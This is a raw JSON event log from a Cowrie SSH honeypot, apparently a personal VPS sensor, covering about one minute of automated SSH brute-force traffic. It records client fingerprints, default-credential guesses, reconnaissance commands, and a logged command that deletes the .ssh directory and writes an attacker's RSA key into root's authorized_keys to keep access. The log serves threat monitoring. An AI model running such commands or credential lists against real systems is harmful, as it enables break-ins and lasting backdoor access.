{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:16:50.846986Z","src_ip":"212.227.125.160","session":"100f6083a0c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44500,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b922775dd92","protocol":"ssh","message":"New connection: 212.227.125.160:44500 (1.2.3.4:22) [session: 7b922775dd92]","sensor":"my-vps","timestamp":"2025-08-31T04:16:53.903091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:16:54.088257Z","src_ip":"212.227.125.160","session":"7b922775dd92"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:16:54.115550Z","src_ip":"212.227.125.160","session":"7b922775dd92"}
{"eventid":"cowrie.login.success","username":"root","password":"Pyd03tix","message":"login attempt [root/Pyd03tix] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:16:56.316365Z","src_ip":"212.227.125.160","session":"100f6083a0c3"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"12345678","message":"login attempt [odoo/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:16:56.540365Z","src_ip":"212.227.125.160","session":"7b922775dd92"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:16:57.960811Z","src_ip":"212.227.125.160","session":"7b922775dd92"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:16:59.823714Z","src_ip":"212.227.125.160","session":"100f6083a0c3"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T04:16:59.824503Z","src_ip":"212.227.125.160","session":"100f6083a0c3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:16:59.958645Z","src_ip":"212.227.235.229","session":"491161b09f51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:16:59.959337Z","src_ip":"212.227.235.229","session":"491161b09f51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39970,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e05bceb053b","protocol":"ssh","message":"New connection: 212.227.235.229:39970 (1.2.3.4:22) [session: 0e05bceb053b]","sensor":"my-vps","timestamp":"2025-08-31T04:17:00.280502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:17:00.281538Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:17:00.607683Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:00.989610Z","src_ip":"212.227.125.160","session":"100f6083a0c3"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:00.990804Z","src_ip":"212.227.125.160","session":"100f6083a0c3"}
{"eventid":"cowrie.login.success","username":"root","password":"PASS!","message":"login attempt [root/PASS!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:17:02.120595Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-31T04:17:02.311442Z","src_ip":"212.227.125.160","session":"35e76c600dd2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:17:02.791481Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:17:02.792316Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:17:02.794532Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:03.121294Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39106,"dst_ip":"1.2.3.4","dst_port":22,"session":"600bfc6d5404","protocol":"ssh","message":"New connection: 212.227.125.160:39106 (1.2.3.4:22) [session: 600bfc6d5404]","sensor":"my-vps","timestamp":"2025-08-31T04:17:03.191965Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:17:04.131894Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:17:04.132798Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:17:04.458240Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:04.459276Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39972,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c1c3bbe4eb8","protocol":"ssh","message":"New connection: 212.227.235.229:39972 (1.2.3.4:22) [session: 9c1c3bbe4eb8]","sensor":"my-vps","timestamp":"2025-08-31T04:17:04.768579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:17:04.769318Z","src_ip":"212.227.235.229","session":"9c1c3bbe4eb8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:17:06.242115Z","src_ip":"212.227.235.229","session":"9c1c3bbe4eb8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:17:07.183182Z","src_ip":"212.227.235.229","session":"9c1c3bbe4eb8"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":48432,"dst_ip":"1.2.3.4","dst_port":22,"session":"b857c4e4d4c8","protocol":"ssh","message":"New connection: 201.148.180.50:48432 (1.2.3.4:22) [session: b857c4e4d4c8]","sensor":"my-vps","timestamp":"2025-08-31T04:17:07.940034Z"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:08.497671Z","src_ip":"212.227.235.229","session":"9c1c3bbe4eb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35778,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dd9aea3d5b8","protocol":"ssh","message":"New connection: 212.227.235.229:35778 (1.2.3.4:22) [session: 4dd9aea3d5b8]","sensor":"my-vps","timestamp":"2025-08-31T04:17:08.811221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:17:08.811883Z","src_ip":"212.227.235.229","session":"4dd9aea3d5b8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:17:08.898087Z","src_ip":"201.148.180.50","session":"b857c4e4d4c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:17:08.898937Z","src_ip":"201.148.180.50","session":"b857c4e4d4c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:17:09.136181Z","src_ip":"212.227.235.229","session":"4dd9aea3d5b8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:17:10.845535Z","src_ip":"212.227.235.229","session":"4dd9aea3d5b8"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:11.163860Z","src_ip":"212.227.235.229","session":"4dd9aea3d5b8"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:11.165032Z","src_ip":"212.227.235.229","session":"0e05bceb053b"}
{"eventid":"cowrie.login.success","username":"root","password":"Pyd03tix","message":"login attempt [root/Pyd03tix] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:17:14.097141Z","src_ip":"201.148.180.50","session":"b857c4e4d4c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:17:17.696020Z","src_ip":"201.148.180.50","session":"b857c4e4d4c8"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T04:17:17.696866Z","src_ip":"201.148.180.50","session":"b857c4e4d4c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:18.950828Z","src_ip":"201.148.180.50","session":"b857c4e4d4c8"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:18.951913Z","src_ip":"201.148.180.50","session":"b857c4e4d4c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33566,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3279d4464d2","protocol":"ssh","message":"New connection: 212.227.235.229:33566 (1.2.3.4:22) [session: c3279d4464d2]","sensor":"my-vps","timestamp":"2025-08-31T04:17:31.694829Z"}
{"eventid":"cowrie.session.closed","duration":"29.0","message":"Connection lost after 29.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:32.159191Z","src_ip":"212.227.125.160","session":"600bfc6d5404"}
{"eventid":"cowrie.session.closed","duration":"66.3","message":"Connection lost after 66.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:32.200872Z","src_ip":"212.227.125.160","session":"35e76c600dd2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:17:32.383744Z","src_ip":"212.227.235.229","session":"c3279d4464d2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:17:32.384512Z","src_ip":"212.227.235.229","session":"c3279d4464d2"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"123456789","message":"login attempt [odoo/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:17:38.257417Z","src_ip":"212.227.235.229","session":"c3279d4464d2"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:40.374723Z","src_ip":"212.227.235.229","session":"c3279d4464d2"}
